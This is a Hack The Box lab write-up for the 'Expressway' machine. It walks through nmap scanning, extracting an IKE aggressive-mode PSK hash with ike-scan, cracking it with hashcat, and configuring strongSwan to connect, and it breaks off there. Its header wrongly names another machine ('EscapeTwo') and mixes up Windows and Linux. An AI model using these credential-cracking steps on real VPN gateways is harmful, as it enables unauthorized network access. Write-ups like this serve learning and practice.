HTB Expressway Writeup

HTBWindows
Table of Contents

EscapeTwo is an easy HTB Linux machine, part of season 9.

nmap

┌──(kali㉿kali)-[~/htb/expressway]
└─$ sudo nmap 10.10.11.87 --min-rate 10000 -p-
[sudo] password for kali:
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-22 22:13 EDT
Nmap scan report for 10.10.11.87
Host is up (0.21s latency).
Not shown: 65534 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh

Nmap done: 1 IP address (1 host up) scanned in 10.79 seconds

┌──(kali㉿kali)-[~/htb/expressway]
└─$ sudo nmap 10.10.11.87 --min-rate 10000 -sU
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-22 22:14 EDT
Nmap scan report for 10.10.11.87
Host is up (0.20s latency).
Not shown: 993 open|filtered udp ports (no-response)
PORT      STATE  SERVICE
500/udp   open   isakmp
814/udp   closed unknown
1023/udp  closed unknown
3702/udp  closed ws-discovery
49184/udp closed unknown
49262/udp closed unknown
54711/udp closed unknown

Nmap done: 1 IP address (1 host up) scanned in 1.13 seconds

┌──(kali㉿kali)-[~/htb/expressway]
└─$ sudo nmap 10.10.11.87 --min-rate 10000 -sU -p 500,814,1023,3702,49184,49262,54711 -sC -sV
[sudo] password for kali:
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-22 23:56 EDT
Nmap scan report for 10.10.11.87
Host is up (0.20s latency).

PORT      STATE  SERVICE      VERSION
500/udp   open   isakmp?
| ike-version:
|   attributes:
|     XAUTH
|_    Dead Peer Detection v1.0
814/udp   closed unknown
1023/udp  closed unknown
3702/udp  closed ws-discovery
49184/udp closed unknown
49262/udp closed unknown
54711/udp closed unknown

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 128.41 seconds

┌──(kali㉿kali)-[~/htb/expressway]
└─$ sudo nmap 10.10.11.87 -p 22 -sC -sV
[sudo] password for kali:
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-23 00:27 EDT
Nmap scan report for 10.10.11.87
Host is up (0.20s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 10.0p2 Debian 8 (protocol 2.0)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 5.53 seconds

Initial nmap scans show only a few pieces of info to go on.

  1. OpenSSH 10.0p2 which is current
  2. isakmp on port 500 UDP.

I’d never heard of isakmp. Google shows that it is for VPN-related Internet Key Exchange traffic.

I’ve never really had much to do with this from an offensive perspective, so further googling of “IKE traffic penetration testing github” and I found a handy blogpost by VeryLazyTech: https://www.verylazytech.com/network-pentesting/ipsec-ike-vpn-port-500-udp with some methodologies and tools.

First up, ike-version script for nmap which gave the same info as -sC default scripts - XAUTH and dead peer detection v1.0

Second, ike-scan which gives us some more information:

┌──(kali㉿kali)-[~/htb/expressway]
└─$ ike-scan -M -A 10.10.11.87
Starting ike-scan 1.9.6 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
10.10.11.87     Aggressive Mode Handshake returned
        HDR=(CKY-R=d31ec53d1ef8b902)
        SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
        KeyExchange(128 bytes)
        Nonce(32 bytes)
        ID(Type=ID_USER_FQDN, Value=ike@expressway.htb)
        VID=09002689dfd6b712 (XAUTH)
        VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0)
        Hash(20 bytes)

Ending ike-scan 1.9.6: 1 hosts scanned in 0.211 seconds (4.73 hosts/sec).  1 returned handshake; 0 returned notify

VeryLazytech says that aggressive mode being enabled is a security risk that opens the door to offline cracking - excellent.

┌──(kali㉿kali)-[~/htb/expressway]
└─$ ike-scan -A --pskcrack 10.10.11.87
Starting ike-scan 1.9.6 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
10.10.11.87     Aggressive Mode Handshake returned HDR=(CKY-R=e98513996c5da6d0) SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800) KeyExchange(128 bytes) Nonce(32 bytes) ID(Type=ID_USER_FQDN, Value=ike@expressway.htb) VID=09002689dfd6b712 (XAUTH) VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0) Hash(20 bytes)

IKE PSK parameters (g_xr:g_xi:cky_r:cky_i:sai_b:idir_b:ni_b:nr_b:hash_r):
05<..snip..>c89
Ending ike-scan 1.9.6: 1 hosts scanned in 0.210 seconds (4.76 hosts/sec).  1 returned handshake; 0 returned notify
┌──(kali㉿kali)-[~/htb/expressway]
└─$ echo '05<..snip..>c89' > psk.txt

I then used hashcat with rockyou and it took all of 0 seconds to crack.

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 5400 (IKE-PSK SHA1)
Hash.Target......: 05...c89
Time.Started.....: Tue Sep 23 14:44:29 2025 (0 secs)
Time.Estimated...: Tue Sep 23 14:44:29 2025 (0 secs)
Kernel.Feature...: Pure Kernel (password length 0-256 bytes)
Guess.Base.......: File (.\rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#01........: 36727.4 kH/s (3.28ms) @ Accel:806 Loops:1 Thr:64 Vec:1
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 9285120/14344385 (64.73%)
Rejected.........: 0/9285120 (0.00%)
Restore.Point....: 6190080/14344385 (43.15%)
Restore.Sub.#01..: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#01...: lilsammy2 -> carmelita4
Hardware.Mon.#01.: Temp: 38c Fan:  0% Util:  9% Core:2625MHz Mem:10251MHz Bus:16

Now with seemingly valid credentials, I actually had no idea how to connect. More research pointed me towards the tool ‘strongswan’ so I installed it and updated my /etc/ipsec.conf and .etc.ipsec.secrets as necessary:

# ipsec.conf - strongSwan IPsec configuration file

# basic configuration

config setup
    charondebug="all"

conn hacktheboxexpressway
    type=tunnel
    auto=start
    keyexchange=ikev1
    authby=secret
    aggressive=yes
    left=10.10.14.3
    leftid=10.10.14.3
    right=10.10.11.87
    rightid=ike@expressway.htb
    ike=3des-sha1-modp1024
    esp=3des-sha1-modp1024
    lifetime=28800s
    ikelifetime=28800s
    xauth=client
# This file holds shared secrets or RSA private keys for authentication.

# RSA private key for this host, authenticating it to any other host
# which knows the public part.

10.10.14.3 ike@expressway.htb : PSK "f<..snip..>d"
┌──(kali㉿kali)-[~/htb/expressway]
└─$ sudo ipsec restart
Stopping strongSwan IPsec...
Starting strongSwan 6.0.2 IPsec [starter]...

┌──(kali㉿kali)-[~/htb/expressway]
└─$ sudo ipsec up hacktheboxexpressway
generating QUICK_MODE request 1660733303 [ HASH SA No KE ID ID ]
sending packet: from 10.10.14.3[500] to 10.10.11.87[500] (300 bytes)
received packet: from 10.10.11.87[500] to 10.10.14.3[500] (76 bytes)
parsed INFORMATIONAL_V1 request 1080286291 [ HASH N(NO_PROP) ]
received NO_PROPOSAL_CHOSEN error notify
establishing connection 'hacktheboxexpressway' failed

I received an error, clearly something was wrong. I googled further and it looks like an additional line may be needed in the secrets file.

## This file holds shared secrets or RSA private keys for authentication.

# RSA private key for this host, authenticating it to any other host
# which knows the public part.

10.10.14.3 ike@expressway.htb : PSK "f<..snip..>d"
10.10.14.3 : XAUTH "ike" "f<..snip..>d"